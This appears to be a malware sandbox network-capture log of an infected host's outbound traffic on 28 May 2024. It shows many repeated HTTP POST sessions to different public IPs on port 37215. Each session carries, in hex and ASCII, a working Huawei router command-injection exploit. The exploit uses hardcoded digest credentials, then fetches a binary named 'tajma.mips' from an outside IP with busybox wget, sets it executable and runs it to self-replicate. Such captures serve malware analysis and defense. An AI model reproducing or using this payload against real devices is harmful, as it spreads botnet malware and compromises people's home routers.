                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2342192.168.2.2345768197.213.52.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.589981079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2343192.168.2.2348734150.83.5.837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.590035915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2344192.168.2.235959841.52.38.6837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.590327024 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2345192.168.2.233302241.253.191.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.590429068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2346192.168.2.2345650157.15.159.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.590429068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2347192.168.2.2335206102.25.89.2337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.590452909 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2348192.168.2.2333824197.69.175.10637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.590454102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2349192.168.2.2339776197.216.72.13037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591288090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2350192.168.2.234538441.240.42.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591346979 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2351192.168.2.2358986157.9.125.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.591347933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
